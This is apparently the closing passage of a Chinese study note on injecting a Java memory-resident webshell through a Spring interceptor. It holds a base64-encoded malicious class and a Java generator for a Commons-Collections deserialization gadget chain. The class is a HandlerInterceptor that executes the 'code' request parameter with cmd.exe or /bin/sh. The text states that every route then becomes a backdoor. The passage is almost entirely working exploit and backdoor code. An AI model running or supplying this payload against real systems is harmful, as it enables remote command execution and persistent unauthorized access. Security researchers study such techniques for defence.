ZWFpoZUM5elpYSjJiR1YwTDJoMGRIQXZTSFIwY0ZObGNuWnNaWFJTWlhGMVpYTjBPd0VBQ0hKbGMzQnZibk5sQVFBb1RHcGhkbUY0TDNObGNuWnNaWFF2YUhSMGNDOUlkSFJ3VTJWeWRteGxkRkpsYzNCdmJuTmxPd0VBQjJoaGJtUnNaWElCQUJKTWFtRjJZUzlzWVc1bkwwOWlhbVZqZERzQkFBUmpiMlJsQVFBTlUzUmhZMnROWVhCVVlXSnNaUWNBVkFjQWFnY0FVd2NBV2djQWFBY0Fhd2NBYkFjQWJRY0Fad0VBQ2tWNFkyVndkR2x2Ym5NQkFCQk5aWFJvYjJSUVlYSmhiV1YwWlhKekFRQUtVMjkxY21ObFJtbHNaUUVBRTFaMWJFbHVkR1Z5WTJWd2RHOXlMbXBoZG1FTUFDRUFJZ2NBYXd3QWJnQnZCd0JzREFCd0FIRUJBQUFCQUFkdmN5NXVZVzFsQndCeURBQnpBRzhNQUhRQWRRRUFBM2RwYmd3QWRnQjNBUUFZYW1GMllTOXNZVzVuTDFCeWIyTmxjM05DZFdsc1pHVnlBUUFRYW1GMllTOXNZVzVuTDFOMGNtbHVad0VBQjJOdFpDNWxlR1VCQUFJdll3d0FJUUI0QVFBSEwySnBiaTl6YUFFQUFpMWpBUUFSYW1GMllTOTFkR2xzTDFOallXNXVaWElNQUhrQWVnY0Fld3dBZkFCOURBQWhBSDRCQUFKY1FRd0Fmd0NBREFDQkFJSU1BSU1BZFF3QWhBQWlCd0JxREFDRkFJWU1BSWNBSWdFQUUycGhkbUV2YkdGdVp5OUZlR05sY0hScGIyNEJBQTVXZFd4SmJuUmxjbU5sY0hSdmNnRUFRVzl5Wnk5emNISnBibWRtY21GdFpYZHZjbXN2ZDJWaUwzTmxjblpzWlhRdmFHRnVaR3hsY2k5SVlXNWtiR1Z5U1c1MFpYSmpaWEIwYjNKQlpHRndkR1Z5QVFBVGFtRjJZUzlwYnk5UWNtbHVkRmR5YVhSbGNnRUFKV3BoZG1GNEwzTmxjblpzWlhRdmFIUjBjQzlJZEhSd1UyVnlkbXhsZEZKbGNYVmxjM1FCQUNacVlYWmhlQzl6WlhKMmJHVjBMMmgwZEhBdlNIUjBjRk5sY25ac1pYUlNaWE53YjI1elpRRUFFR3BoZG1FdmJHRnVaeTlQWW1wbFkzUUJBQXhuWlhSUVlYSmhiV1YwWlhJQkFDWW9UR3BoZG1FdmJHRnVaeTlUZEhKcGJtYzdLVXhxWVhaaEwyeGhibWN2VTNSeWFXNW5Pd0VBQ1dkbGRGZHlhWFJsY2dFQUZ5Z3BUR3BoZG1FdmFXOHZVSEpwYm5SWGNtbDBaWEk3QVFBUWFtRjJZUzlzWVc1bkwxTjVjM1JsYlFFQUMyZGxkRkJ5YjNCbGNuUjVBUUFMZEc5TWIzZGxja05oYzJVQkFCUW9LVXhxWVhaaEwyeGhibWN2VTNSeWFXNW5Pd0VBQ0dOdmJuUmhhVzV6QVFBYktFeHFZWFpoTDJ4aGJtY3ZRMmhoY2xObGNYVmxibU5sT3lsYUFRQVdLRnRNYW1GMllTOXNZVzVuTDFOMGNtbHVaenNwVmdFQUJYTjBZWEowQVFBVktDbE1hbUYyWVM5c1lXNW5MMUJ5YjJObGMzTTdBUUFSYW1GMllTOXNZVzVuTDFCeWIyTmxjM01CQUE1blpYUkpibkIxZEZOMGNtVmhiUUVBRnlncFRHcGhkbUV2YVc4dlNXNXdkWFJUZEhKbFlXMDdBUUFZS0V4cVlYWmhMMmx2TDBsdWNIVjBVM1J5WldGdE95bFdBUUFNZFhObFJHVnNhVzFwZEdWeUFRQW5LRXhxWVhaaEwyeGhibWN2VTNSeWFXNW5PeWxNYW1GMllTOTFkR2xzTDFOallXNXVaWEk3QVFBSGFHRnpUbVY0ZEFFQUF5Z3BXZ0VBQkc1bGVIUUJBQVZqYkc5elpRRUFCWGR5YVhSbEFRQVZLRXhxWVhaaEwyeGhibWN2VTNSeWFXNW5PeWxXQVFBRlpteDFjMmdBSVFBZkFDQUFBQUFBQUFJQUFRQWhBQ0lBQVFBakFBQUFMd0FCQUFFQUFBQUZLcmNBQWJFQUFBQUNBQ1FBQUFBR0FBRUFBQUFGQUNVQUFBQU1BQUVBQUFBRkFDWUFKd0FBQUFFQUtBQXBBQU1BSXdBQUFib0FCZ0FKQUFBQXJ5c1NBcmtBQXdJQU9nUVpCTVlBb1N5NUFBUUJBRG9GRWdVNkJoSUd1QUFIdGdBSUVnbTJBQXFaQUNLN0FBdFpCcjBBREZrREVnMVRXUVFTRGxOWkJSa0VVN2NBRHpvSHB3QWZ1d0FMV1FhOUFBeFpBeElRVTFrRUVoRlRXUVVaQkZPM0FBODZCN3NBRWxrWkI3WUFFN1lBRkxjQUZSSVd0Z0FYT2dnWkNMWUFHSmtBQ3hrSXRnQVpwd0FGR1FZNkJoa0l0Z0FhR1FVWkJyWUFHeGtGdGdBY0dRVzJBQjJuQUFVNkJRT3NCS3dBQVFBUEFLWUFxUUFlQUFNQUpBQUFBRVlBRVFBQUFBZ0FDZ0FKQUE4QUN3QVhBQXdBR3dBT0FDc0FEd0JLQUJFQVpnQVRBSHdBRkFDUUFCVUFsUUFXQUp3QUZ3Q2hBQmdBcGdBYUFLa0FHUUNyQUJzQXJRQWRBQ1VBQUFCbUFBb0FSd0FEQUNvQUt3QUhBQmNBandBc0FDMEFCUUFiQUlzQUxnQXZBQVlBWmdCQUFDb0FLd0FIQUh3QUtnQXdBREVBQ0FBQUFLOEFKZ0FuQUFBQUFBQ3ZBRElBTXdBQkFBQUFyd0EwQURVQUFnQUFBSzhBTmdBM0FBTUFDZ0NsQURnQUx3QUVBRGtBQUFBNUFBZitBRW9IQURvSEFEc0hBRHI4QUJzSEFEejhBQ1VIQUQxQkJ3QTYvd0FhQUFVSEFENEhBRDhIQUVBSEFFRUhBRG9BQVFjQVFnRUJBRU1BQUFBRUFBRUFIZ0JFQUFBQURRTUFNZ0FBQURRQUFBQTJBQUFBQVFCRkFBQUFBZ0JHAQAWc3VuL21pc2MvQkFTRTY0RGVjb2RlcgwAhgCHDACIAIkHAIoMAIsAjAwAjQCOAQAVamF2YS9sYW5nL0NsYXNzTG9hZGVyAQALZGVmaW5lQ2xhc3MBAA9qYXZhL2xhbmcvQ2xhc3MBABBqYXZhL2xhbmcvU3RyaW5nBwCPDACQAJEMAJIAkwcAlAEAEGphdmEvbGFuZy9PYmplY3QMAJUAlgwAlwCYDACZAJoMAJsAnAEABEV2aWwBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAPG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL2NvbnRleHQvcmVxdWVzdC9SZXF1ZXN0Q29udGV4dEhvbGRlcgEAGGN1cnJlbnRSZXF1ZXN0QXR0cmlidXRlcwEAPSgpTG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL2NvbnRleHQvcmVxdWVzdC9SZXF1ZXN0QXR0cmlidXRlczsBADlvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9jb250ZXh0L3JlcXVlc3QvUmVxdWVzdEF0dHJpYnV0ZXMBAAxnZXRBdHRyaWJ1dGUBACcoTGphdmEvbGFuZy9TdHJpbmc7SSlMamF2YS9sYW5nL09iamVjdDsBAAdnZXRCZWFuAQAmKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL09iamVjdDsBABBnZXREZWNsYXJlZEZpZWxkAQAtKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7AQAXamF2YS9sYW5nL3JlZmxlY3QvRmllbGQBAA1zZXRBY2Nlc3NpYmxlAQAEKFopVgEAA2dldAEAJihMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQALbmV3SW5zdGFuY2UBABQoKUxqYXZhL2xhbmcvT2JqZWN0OwEADGRlY29kZUJ1ZmZlcgEAFihMamF2YS9sYW5nL1N0cmluZzspW0IBABBqYXZhL2xhbmcvVGhyZWFkAQANY3VycmVudFRocmVhZAEAFCgpTGphdmEvbGFuZy9UaHJlYWQ7AQAVZ2V0Q29udGV4dENsYXNzTG9hZGVyAQAZKClMamF2YS9sYW5nL0NsYXNzTG9hZGVyOwEAEWphdmEvbGFuZy9JbnRlZ2VyAQAEVFlQRQEAEUxqYXZhL2xhbmcvQ2xhc3M7AQARZ2V0RGVjbGFyZWRNZXRob2QBAEAoTGphdmEvbGFuZy9TdHJpbmc7W0xqYXZhL2xhbmcvQ2xhc3M7KUxqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7AQAYamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kAQAHdmFsdWVPZgEAFihJKUxqYXZhL2xhbmcvSW50ZWdlcjsBAAZpbnZva2UBADkoTGphdmEvbGFuZy9PYmplY3Q7W0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAAlsb2FkQ2xhc3MBACUoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvQ2xhc3M7AQADYWRkAQAVKExqYXZhL2xhbmcvT2JqZWN0OylaACEAIgAjAAAAAAADAAEAJAAlAAIAJgAAAYMABgAKAAAAtSq3AAG4AAISAwO5AAQDAMAABUwrEga5AAcCAMAACE0SCBIJtgAKTi0EtgALLSy2AAzAAA06BBIOOgUSDzoGEhC2ABHAABAZBrYAEjoHuAATtgAUOggSFRIWB70AF1kDEhhTWQQSGVNZBbIAGlNZBrIAGlO2ABs6CRkJBLYAHBkJGQgHvQAdWQMZBVNZBBkHU1kFA7gAHlNZBhkHvrgAHlO2AB9XGQQZCBIOtgAgtgARtgAhV7EAAAADACcAAAA+AA8AAAAKAAQADAATAA4AHwAPACcAEAAsABEANgATADoAFAA+ABUATQAWAFUAFwB4ABgAfgAZAKQAGgC0ABsAKAAAAGYACgAAALUAKQAqAAAAEwCiACsALAABAB8AlgAtAC4AAgAnAI4ALwAwAAMANgB/ADEAMgAEADoAewAzADQABQA+AHcANQA0AAYATQBoADYANwAHAFUAYAA4ADkACAB4AD0AOgA7AAkAPAAAAAwAAQA2AH8AMQA9AAQAPgAAAAQAAQA/AAEAQABBAAMAJgAAAD8AAAADAAAAAbEAAAACACcAAAAGAAEAAAAgACgAAAAgAAMAAAABACkAKgAAAAAAAQBCAEMAAQAAAAEARABFAAIAPgAAAAQAAQBGAEcAAAAJAgBCAAAARAAAAAEAQABIAAMAJgAAAEkAAAAEAAAAAbEAAAACACcAAAAGAAEAAAAlACgAAAAqAAQAAAABACkAKgAAAAAAAQBCAEMAAQAAAAEASQBKAAIAAAABAEsATAADAD4AAAAEAAEARgBHAAAADQMAQgAAAEkAAABLAAAAAQBNAAAAAgBO");
  24.         // 写入.class 文件
  25.         // 将我的恶意类转成字节码,并且反射设置 bytecodes
  26.         byte[][] targetByteCodes = new byte[][]{classBytes};
  27.         TemplatesImpl templates = TemplatesImpl.class.newInstance();
  29.         Field f0 = templates.getClass().getDeclaredField("_bytecodes");
  30.         f0.setAccessible(true);
  31.         f0.set(templates,targetByteCodes);
  33.         f0 = templates.getClass().getDeclaredField("_name");
  34.         f0.setAccessible(true);
  35.         f0.set(templates,"name");
  37.         f0 = templates.getClass().getDeclaredField("_class");
  38.         f0.setAccessible(true);
  39.         f0.set(templates,null);
  41.         InvokerTransformer transformer = new InvokerTransformer("asdfasdfasdf", new Class[0], new Object[0]);
  42.         HashMap innermap = new HashMap();
  43.         LazyMap map = (LazyMap)LazyMap.decorate(innermap,transformer);
  44.         TiedMapEntry tiedmap = new TiedMapEntry(map,templates);
  45.         HashSet hashset = new HashSet(1);
  46.         hashset.add("foo");
  47.         Field f = null;
  48.         try {
  49.             f = HashSet.class.getDeclaredField("map");
  50.         } catch (NoSuchFieldException e) {
  51.             f = HashSet.class.getDeclaredField("backingMap");
  52.         }
  53.         f.setAccessible(true);
  54.         HashMap hashset_map = (HashMap) f.get(hashset);
  56.         Field f2 = null;
  57.         try {
  58.             f2 = HashMap.class.getDeclaredField("table");
  59.         } catch (NoSuchFieldException e) {
  60.             f2 = HashMap.class.getDeclaredField("elementData");
  61.         }
  63.         f2.setAccessible(true);
  64.         Object[] array = (Object[])f2.get(hashset_map);
  66.         Object node = array[0];
  67.         if(node == null){
  68.             node = array[1];
  69.         }
  70.         Field keyField = null;
  71.         try{
  72.             keyField = node.getClass().getDeclaredField("key");
  73.         }catch(Exception e){
  74.             keyField = Class.forName("java.util.MapEntry").getDeclaredField("key");
  75.         }
  76.         keyField.setAccessible(true);
  77.         keyField.set(node,tiedmap);
  79.         Field f3 = transformer.getClass().getDeclaredField("iMethodName");
  80.         f3.setAccessible(true);
  81.         f3.set(transformer,"newTransformer");
  83.         try{
  84.             ByteArrayOutputStream barr = new ByteArrayOutputStream();
  85.             ObjectOutputStream oos = new ObjectOutputStream(barr);
  86.             oos.writeObject(hashset);
  87.             oos.close();
  88. //        System.out.println(barr);
  90.             System.out.println(Base64.getEncoder().encodeToString(barr.toByteArray()));
  92. //            ObjectInputStream inputStream = new ObjectInputStream(new FileInputStream("./cc11"));
  93. //            inputStream.readObject();
  94.         }catch(Exception e){
  95.             e.printStackTrace();
  96.         }
  97.     }
  99. }

注入效果:

Java内存马学习笔记-Interceptor - 图10

Java内存马学习笔记-Interceptor - 图11

现在任意路由访问输入code参数都是后门。

参考

https://landgrey.me/blog/19/

https://juejin.cn/post/6844904020675559432

https://github.com/Stakcery/JavaSec/blob/main/5.内存马学习/Spring/利用intercetor注入Spring内存马/code/TouchFilea.java